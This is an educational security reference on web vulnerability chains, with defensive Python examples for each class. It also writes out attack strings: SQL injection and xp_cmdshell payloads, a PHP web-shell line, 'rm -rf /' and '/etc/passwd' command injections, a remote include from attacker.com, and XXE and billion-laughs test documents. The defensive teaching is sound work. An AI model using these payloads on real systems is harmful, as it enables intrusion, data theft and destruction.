Common Web Vulnerability Chains with Examples
1. Cross-Site Scripting (XSS)
XSS → Session Hijacking → Privilege Escalation
Example:
- A comment section on a website is vulnerable to stored XSS.
- An attacker posts a comment containing a malicious script that steals session cookies when viewed by other users.
- The script sends the session cookie to the attacker, who then uses it to impersonate the user and escalate privileges.
XSS → CSRF → Account Takeover
Example:
- A web application allows users to update their email without CSRF protection.
- The attacker sends a link with an embedded XSS payload to the victim.
- When the victim clicks the link, the XSS payload executes a CSRF attack, changing the victim's email address.
XSS → LFI/RFI → RCE
Example:
- An attacker finds an XSS vulnerability in a search feature and exploits it to inject a script that exploits an RFI vulnerability.
- The RFI payload points to an external malicious script, which gets executed on the server, leading to RCE.
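The two controls that break the XSS → session hijacking chain are contextual output encoding of untrusted content and cookie flags that keep the session out of reach of any script that does run. The following is an added example written for this page (not code from the original), with the template, the comment text and the cookie name constructed for the demo:

```python
"""Added example (not from the original page): mitigating stored XSS and cookie theft.

1. html.escape() encodes untrusted comment text before it is placed in HTML, so a
   <script> tag in a comment renders as text instead of executing.
2. HttpOnly/Secure/SameSite flags on the session cookie mean that even a script which
   does execute cannot read document.cookie or ride along on cross-site requests.
"""
import html
from http.cookies import SimpleCookie

# Constructed template for one rendered comment.
COMMENT_TEMPLATE = '<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment(author: str, body: str) -> str:
    """Render one comment with both untrusted fields HTML-escaped.
    quote=True also escapes ' and ", which matters if a value ever lands in an attribute."""
    return COMMENT_TEMPLATE.format(
        author=html.escape(author, quote=True),
        body=html.escape(body, quote=True),
    )


def session_cookie_header(token: str) -> str:
    """Build the Set-Cookie value for the session id with defensive flags:
    HttpOnly (not readable from JavaScript), Secure (HTTPS only), SameSite=Strict."""
    cookie = SimpleCookie()
    cookie["session"] = token
    morsel = cookie["session"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Strict"
    morsel["path"] = "/"
    return morsel.OutputString()


def is_script_free(rendered: str) -> bool:
    """Check used by the demo: no raw tag survives in the rendered markup."""
    return "<script" not in rendered and "onerror=" not in rendered


# Constructed sample: a comment body carrying a script tag, as in the stored-XSS scenario.
SAMPLE_COMMENT = "<script>alert('stored xss')</script>"

if __name__ == "__main__":
    page = render_comment("mallory", SAMPLE_COMMENT)
    print(page)
    print("Set-Cookie:", session_cookie_header("opaque-session-id"))
```

Encoding must match the output context (HTML body here; attribute, URL and JavaScript contexts each need their own encoder), and a Content-Security-Policy that disallows inline scripts is the usual second layer.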
2. SQL Injection (SQLi)
SQLi → Data Exfiltration → Credential Theft
Example:
- An attacker injects OR 1=1 into a login form.
- This bypasses authentication and returns all user records, revealing usernames and hashed passwords.
SQLi → Authentication Bypass → Privilege Escalation
Example:
- Injecting ' OR '1'='1 into a login form bypasses authentication.
- The attacker gains access to the application with administrative privileges.
SQLi → RCE
Example:
- The application has a vulnerable SQL query that allows executing commands (e.g., xp_cmdshell in SQL Server).
- The attacker injects ; exec xp_cmdshell('dir'); -- to execute commands on the server.
SQLi → LFI
Example:
- An attacker exploits SQLi to read a file from the server, such as the application configuration file.
- The query UNION SELECT LOAD_FILE('/etc/passwd') reveals sensitive information, enabling further attacks.
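The authentication-bypass chain above comes down to user input changing the structure of the query rather than just its values. The following added example (written for this page, not code from the original) shows the ' OR '1'='1 payload against a login query built by string formatting and the parameterized query that defeats it; the users table, the sample accounts and the function names are constructed for the demo:

```python
"""Added example (not from the original page): why ' OR '1'='1 bypasses a login whose SQL
is assembled from strings, and the parameterized query that does not.
Runs against an in-memory SQLite database seeded with constructed sample users."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users with SHA-256 password hashes (demo only; real
    password storage needs a slow, salted hash such as bcrypt, scrypt or Argon2)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT, role TEXT)")
    for user, pw, role in [("admin", "correct horse", "admin"), ("alice", "hunter2", "user")]:
        conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                     (user, hashlib.sha256(pw.encode()).hexdigest(), role))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Query text is built from user input, so the input can rewrite the query's logic.
    With username = ' OR '1'='1 the WHERE clause becomes
        pw_hash = '<hash>' AND username = '' OR '1'='1'
    and because AND binds tighter than OR, the trailing OR '1'='1' is true for every row."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username, role FROM users "
             f"WHERE pw_hash = '{pw_hash}' AND username = '{username}'")
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Placeholders send the values separately from the SQL text, so quote characters in
    the username are compared as data and never parsed as SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    return conn.execute(
        "SELECT username, role FROM users WHERE pw_hash = ? AND username = ?",
        (pw_hash, username),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:    ", login_vulnerable(db, payload, "wrong"))     # every user row
    print("parameterized: ", login_parameterized(db, payload, "wrong"))  # []
```

Parameterization removes the injection point; the RCE and LFI variants above are additionally contained by running the application's database account with the least privilege it needs (no xp_cmdshell, no FILE privilege).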
3. Local File Inclusion (LFI)
LFI → Information Disclosure → Credential Theft
Example:
- An attacker exploits LFI to read /etc/passwd and /var/www/html/config.php. This reveals database credentials stored in the configuration file.
LFI → RCE
Example:
- LFI is used to include /proc/self/environ or logs containing PHP code injected by the attacker.
- The attacker injects <?php system($_GET['cmd']); ?> into the logs and includes the log file to achieve RCE.
4. Remote File Inclusion (RFI)
RFI → Web Shell Upload → Persistent Backdoor
Example:
- An attacker includes a remote script that uploads a PHP web shell to the server.
- The attacker accesses the web shell at http://example.com/shell.php, maintaining persistent control.
RFI → RCE
Example:
- An RFI vulnerability allows including http://attacker.com/shell.php.
- The included script contains malicious code that executes commands on the server.
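Both the LFI chains (section 3) and the RFI chains (section 4) start with a page parameter that is passed to an include. The following added example (written for this page, not code from the original or from PHP) shows how to resolve such a parameter safely: an allowlist of page names, refusal of anything carrying a URL scheme, and canonical-path containment as defence in depth. The PAGES table, the template directory and the helper names are constructed for the demo:

```python
"""Added example (not from the original page): hardening an include against LFI and RFI.
Requests are resolved by name through an allowlist, never as raw paths; any URL scheme
(remote include) is refused; and the final path is canonicalized and checked to stay
inside the template directory."""
import tempfile
from pathlib import Path
from urllib.parse import urlsplit


class IncludeError(ValueError):
    """Raised for any include request that is not a known, local template."""


# Allowlist: the only values a ?page= parameter may select. Map names, not paths.
PAGES = {"home": "home.tpl", "about": "about.tpl"}


def resolve_include(base_dir: Path, requested: str) -> Path:
    """Return the template file for `requested`, or raise IncludeError."""
    # Step 1: anything with a scheme is a remote include (e.g. http://attacker.com/shell.php)
    if urlsplit(requested).scheme:
        raise IncludeError("remote includes are not allowed")
    # Step 2: only allowlisted names are accepted; user input never becomes a filesystem path
    filename = PAGES.get(requested)
    if filename is None:
        raise IncludeError(f"unknown page {requested!r}")
    # Step 3: defence in depth: canonicalize and confirm the file is still inside base_dir
    root = base_dir.resolve()
    candidate = (root / filename).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise IncludeError("template path escapes the include directory") from None
    if not candidate.is_file():
        raise IncludeError("template does not exist")
    return candidate


def is_allowed(base_dir: Path, requested: str) -> bool:
    """Boolean wrapper used by the demo and its checks."""
    try:
        resolve_include(base_dir, requested)
        return True
    except IncludeError:
        return False


def make_demo_templates() -> Path:
    """Constructed fixture: a temporary template directory containing home.tpl only."""
    base = Path(tempfile.mkdtemp(prefix="tpl-"))
    (base / "home.tpl").write_text("<h1>Home</h1>")
    return base


if __name__ == "__main__":
    base = make_demo_templates()
    for req in ["home", "about", "../../etc/passwd", "/proc/self/environ",
                "http://attacker.com/shell.php"]:
        try:
            print(req, "->", resolve_include(base, req))
        except IncludeError as exc:
            print(req, "-> rejected:", exc)
```

In a PHP deployment the same intent is backed by configuration: allow_url_include=Off removes remote includes regardless of application code, and open_basedir bounds what any include can reach.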
5. Cross-Site Request Forgery (CSRF)
CSRF → Account Takeover → Business Logic Abuse
Example:
- The attacker crafts a malicious form that changes the user's password.
- When the victim submits the form, their password is changed without their knowledge.
CSRF → XSS Injection
Example:
- The attacker crafts a malicious form that injects a script into the user's profile.
- When the victim submits the form, the script is stored and executed whenever the profile is viewed.
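Both CSRF chains rely on the server accepting a state-changing request without proof that the user's own page sent it. The following added example (written for this page, not code from the original) shows the server side of that proof for the email/password-change form: a per-session HMAC token compared in constant time, plus an Origin/Referer check that fails closed. SERVER_SECRET, SITE_ORIGIN and handle_change_email are constructed for the demo:

```python
"""Added example (not from the original page): server-side CSRF defence for a
state-changing form. A token bound to the session is required on every POST, and the
request's Origin (or Referer) must match the site's own origin."""
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # constructed; load from a secret store in production
SITE_ORIGIN = "https://app.example"       # constructed: the only origin allowed to submit forms


def csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token derived from the session id. An attacker's page cannot compute it without the
    server secret, and a token from one session does not validate for another."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted: Optional[str], secret: bytes = SERVER_SECRET) -> bool:
    expected = csrf_token(session_id, secret)
    return hmac.compare_digest(expected, submitted or "")   # constant-time comparison


def origin_allowed(headers: dict) -> bool:
    """Browsers attach Origin to cross-site POSTs; with neither header present, fail closed."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def handle_change_email(session_id: str, form: dict, headers: dict) -> str:
    """The protected handler: both checks must pass before any state changes."""
    if not origin_allowed(headers):
        return "rejected: cross-site origin"
    if not verify_csrf(session_id, form.get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    return f"email changed to {form['email']}"


if __name__ == "__main__":
    token = csrf_token("sess-1")   # the server embeds this in its own form as a hidden field
    print(handle_change_email("sess-1", {"email": "a@b.example", "csrf_token": token},
                              {"Origin": SITE_ORIGIN}))
    print(handle_change_email("sess-1", {"email": "a@b.example"},   # forged form: no token
                              {"Origin": "https://evil.example"}))
```

Setting the session cookie with SameSite=Lax or Strict adds a browser-enforced layer, but the token check remains the control the server can verify on its own.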
6. Command Injection
Command Injection → RCE
Example:
- A web application passes user input to a system shell without sanitization.
- The attacker injects ; rm -rf /; into the input field, causing arbitrary commands to be executed.
Command Injection → Data Exfiltration
Example:
- An attacker injects ; cat /etc/passwd; into a vulnerable input field.
- The command reveals sensitive information that the attacker can exfiltrate.
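Both chains above depend on a shell parsing the attacker's input, so the fix is to keep the input out of any shell: validate it against a strict allowlist and pass it as a single argv element. The following added example (written for this page, not code from the original) does that for a hostname parameter; HOSTNAME_RE, ping_command and echo_literal are constructed for the demo:

```python
"""Added example (not from the original page): running an external command with untrusted
input without a shell. The value is validated as a hostname and passed as one argv
element, so ';', '|', '$(...)' and similar are never interpreted."""
import re
import shlex
import subprocess

# RFC 1123-style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_host(value: str) -> str:
    """Allowlist validation: anything that is not a plain hostname is refused outright."""
    if not HOSTNAME_RE.match(value):
        raise ValueError(f"invalid hostname: {value!r}")
    return value


def is_valid_host(value: str) -> bool:
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


def ping_command(host: str) -> list:
    """Build argv for the system ping; the user value is exactly one argument."""
    return ["ping", "-c", "1", validate_host(host)]


def run_argv(argv: list) -> str:
    # shell=False (the default): argv goes to execve directly; no shell sees metacharacters.
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def echo_literal(user_input: str) -> str:
    """Demonstrates argv passing: the string is echoed back verbatim, not executed."""
    return run_argv(["echo", user_input]).rstrip("\n")


def quoted_for_shell(user_input: str) -> str:
    """Last resort when a shell command string is unavoidable: shlex.quote makes the whole
    value one single-quoted word. Prefer argv lists; this is the fallback, not the fix."""
    return shlex.quote(user_input)


if __name__ == "__main__":
    sample = "; cat /etc/passwd;"          # the page's injection string as test input
    print("valid host?", is_valid_host(sample))
    print("echoed literally:", echo_literal(sample))
    print("argv for a good host:", ping_command("example.com"))
```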
7. Server-Side Request Forgery (SSRF)
SSRF → Internal Network Scanning → Pivoting
Example:
- An SSRF vulnerability allows the attacker to send requests to internal IP addresses.
- The attacker discovers internal services and exploits them to pivot deeper into the network.
SSRF → Metadata Service Access → Cloud Account Takeover
Example:
- The attacker exploits SSRF to access the cloud provider's metadata service.
- The attacker retrieves IAM credentials, gaining control over the cloud account.
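Both SSRF chains are stopped at the same point: before the server opens a connection, it must know where the URL actually leads. The following added example (written for this page, not code from the original) is an egress guard that allows only http/https, resolves the host, and refuses loopback, private, link-local (where cloud metadata endpoints live) and other non-global addresses. The resolver parameter and the DEMO_DNS table are constructed so the demo runs offline and deterministically:

```python
"""Added example (not from the original page): an egress guard for server-side fetches.
It returns the vetted IP addresses a URL resolves to, or raises SSRFBlocked."""
import ipaddress
import socket
from urllib.parse import urlsplit


class SSRFBlocked(ValueError):
    pass


def system_resolver(host: str) -> list:
    """Real DNS lookup; swapped for a lookup table in the demo."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: str) -> bool:
    """Global unicast only: rejects RFC 1918, loopback, link-local (169.254/16 carries the
    metadata services of the major cloud providers), multicast, reserved and unspecified."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not (addr.is_multicast or addr.is_link_local)


def check_outbound_url(url: str, resolver=system_resolver) -> list:
    """Vet `url` and return the addresses it resolves to. Callers should connect to one of
    these addresses (sending the Host header) instead of re-resolving, which closes the
    DNS-rebinding window between check and use."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise SSRFBlocked(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname
    if not host:
        raise SSRFBlocked("missing host")
    try:                                     # literal IP in the URL: no DNS involved
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        raise SSRFBlocked(f"{host} did not resolve")
    for ip in addrs:                         # every address must be public, not just the first
        if not is_public_address(ip):
            raise SSRFBlocked(f"{host} resolves to non-public address {ip}")
    return addrs


def is_allowed_url(url: str, resolver=system_resolver) -> bool:
    try:
        check_outbound_url(url, resolver)
        return True
    except SSRFBlocked:
        return False


# Constructed lookup table standing in for DNS.
DEMO_DNS = {
    "www.example.com": ["93.184.216.34"],
    "intranet.corp.example": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
}


def demo_resolver(host: str) -> list:
    return DEMO_DNS.get(host, [])


if __name__ == "__main__":
    for url in ["https://www.example.com/feed", "http://intranet.corp.example/",
                "http://localhost:8080/admin", "http://169.254.10.20/", "file:///etc/passwd"]:
        print(url, "->", "allowed" if is_allowed_url(url, demo_resolver) else "blocked")
```

A network-level egress policy (no route from the web tier to internal ranges, IMDSv2-style session tokens on the metadata service) should back this up, since an application-layer check alone cannot cover redirects and protocol quirks in every client library.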
8. Insecure Deserialization
Insecure Deserialization → RCE
Example:
- The application deserializes untrusted data.
- The attacker crafts a serialized payload that executes arbitrary code upon deserialization.
Insecure Deserialization → Authentication Bypass
Example:
- The attacker manipulates a serialized object to escalate their privileges.
- Upon deserialization, the attacker gains administrative access.
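Native object serializers (Python pickle, Java serialization, PHP unserialize) reconstruct arbitrary object graphs and so give an attacker the RCE chain above; the privilege-escalation chain needs only a text editor. The following added example (written for this page, not code from the original) replaces both with a plain JSON payload that is HMAC-signed and schema-checked, so an edited "role" field fails at signature verification before it is even parsed. SIGNING_KEY, FIELD_TYPES and the helper names are constructed for the demo:

```python
"""Added example (not from the original page): a signed, schema-checked JSON envelope in
place of native object deserialization. Verify first, parse second, validate third."""
import base64
import binascii
import hashlib
import hmac
import json
from typing import Optional

SIGNING_KEY = b"constructed-demo-key-replace-me"   # constructed; use a managed secret in production
FIELD_TYPES = {"user_id": int, "role": str}        # the only shape a session payload may have
ROLES = {"user", "admin"}


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode())


def serialize_session(data: dict, key: bytes = SIGNING_KEY) -> str:
    """Plain JSON (no type tags, no object graph) plus an HMAC-SHA256 tag over the bytes."""
    body = json.dumps(data, sort_keys=True, separators=(",", ":")).encode()
    return _b64(body) + "." + _b64(hmac.new(key, body, hashlib.sha256).digest())


def deserialize_session(token: str, key: bytes = SIGNING_KEY) -> dict:
    """Return the validated payload or raise ValueError."""
    try:
        body_b64, tag_b64 = token.split(".", 1)
        body, tag = _unb64(body_b64), _unb64(tag_b64)
    except (ValueError, binascii.Error):
        raise ValueError("malformed token") from None
    # 1. Authenticate the bytes before interpreting them.
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("signature mismatch: payload altered or forged")
    # 2. Parse as data only: json.loads builds dicts and lists, never objects with behaviour.
    data = json.loads(body)
    # 3. Enforce the expected shape: exact field set, exact types, known role values.
    if not isinstance(data, dict) or set(data) != set(FIELD_TYPES):
        raise ValueError("unexpected payload shape")
    for field, expected in FIELD_TYPES.items():
        if type(data[field]) is not expected:
            raise ValueError(f"bad type for {field}")
    if data["role"] not in ROLES:
        raise ValueError("unknown role")
    return data


def deserialize_or_none(token: str, key: bytes = SIGNING_KEY) -> Optional[dict]:
    try:
        return deserialize_session(token, key)
    except ValueError:
        return None


def tampered_copy(token: str, changes: dict) -> str:
    """Constructed test vector: rewrite body fields but keep the old tag, which is what the
    privilege-escalation chain above amounts to for someone without the signing key."""
    body_b64, tag_b64 = token.split(".", 1)
    data = json.loads(_unb64(body_b64))
    data.update(changes)
    body = json.dumps(data, sort_keys=True, separators=(",", ":")).encode()
    return _b64(body) + "." + tag_b64


if __name__ == "__main__":
    token = serialize_session({"user_id": 7, "role": "user"})
    print("genuine:", deserialize_or_none(token))                          # {'role': 'user', 'user_id': 7}
    print("tampered:", deserialize_or_none(tampered_copy(token, {"role": "admin"})))  # None
```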
9. XML External Entity (XXE)
XXE → File Disclosure → Credential Theft
Example:
- An XXE payload in an XML file retrieves /etc/passwd.
- The attacker uses this information to further compromise the system.
XXE → SSRF
Example:
- An XXE payload makes internal HTTP requests.
- The attacker discovers internal services and potentially exploits them.
XXE → Denial of Service (DoS)
Example:
- An XXE payload triggers a billion laughs attack, consuming server resources and causing a DoS.
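All three XXE chains (file disclosure, SSRF and billion laughs) require a DTD: without a DOCTYPE there are no entity declarations to abuse. The following added example (written for this page, not code from the original) parses untrusted XML with Python's standard library only, aborting at the first DOCTYPE or ENTITY declaration before any expansion happens. The sample documents are constructed for the demo:

```python
"""Added example (not from the original page): rejecting DTDs before parsing untrusted XML.
Pass 1 runs the raw expat parser with handlers that raise on DOCTYPE/ENTITY declarations,
so nothing is ever expanded or fetched. Pass 2 parses the now DTD-free document normally."""
from typing import Optional
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document declares a DTD or entities."""


def _reject_doctype(*_args) -> None:
    raise UnsafeXML("DOCTYPE declarations are not accepted")


def _reject_entity(*_args) -> None:
    raise UnsafeXML("entity declarations are not accepted")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Return the root element, or raise UnsafeXML (DTD present) / ET.ParseError (malformed)."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype   # fires before any entity is declared
    scanner.EntityDeclHandler = _reject_entity          # belt and braces
    scanner.Parse(data, True)                           # exceptions from handlers propagate
    return ET.fromstring(data)


def parse_or_none(data: bytes) -> Optional[ET.Element]:
    try:
        return parse_untrusted_xml(data)
    except UnsafeXML:
        return None


# Constructed samples.
SAFE_DOC = b"<order><item qty='2'>widget</item></order>"
EXTERNAL_ENTITY_DOC = (b"<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
                       b"<foo>&xxe;</foo>")
LAUGHS_DOC = (b"<?xml version='1.0'?><!DOCTYPE lolz [<!ENTITY lol 'lol'>"
              b"<!ENTITY lol2 '&lol;&lol;&lol;&lol;'>]><lolz>&lol2;</lolz>")

if __name__ == "__main__":
    print("safe:", parse_untrusted_xml(SAFE_DOC).find("item").text)   # widget
    for name, doc in [("external entity", EXTERNAL_ENTITY_DOC), ("billion laughs", LAUGHS_DOC)]:
        print(name, "->", "rejected" if parse_or_none(doc) is None else "parsed")
```

Where a DTD is genuinely required, the equivalent configuration on other parsers is to disable external entity resolution and entity expansion limits (e.g. the defusedxml package in Python, or the corresponding factory features in Java's DocumentBuilderFactory); the reject-all-DTDs approach above is the simplest rule when the schema does not need one.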
10. Clickjacking
Clickjacking → CSRF → Account Takeover
Example:
- The attacker overlays a transparent iframe over a legitimate website.
- The victim unknowingly clicks on buttons that trigger CSRF attacks.
Clickjacking → XSS Injection
Example:
- The attacker uses clickjacking to trick the victim into clicking on elements that inject XSS payloads.
11. Self-XSS
Self-XSS → Credential Theft
Example:
- The attacker convinces the victim to paste a malicious script into their browser console.
- The script sends the victim's session cookies to the attacker.
Self-XSS → Account Takeover
Example:
- The victim runs a script that changes their account settings.
- The attacker gains control over the victim's account by changing the email address and password.
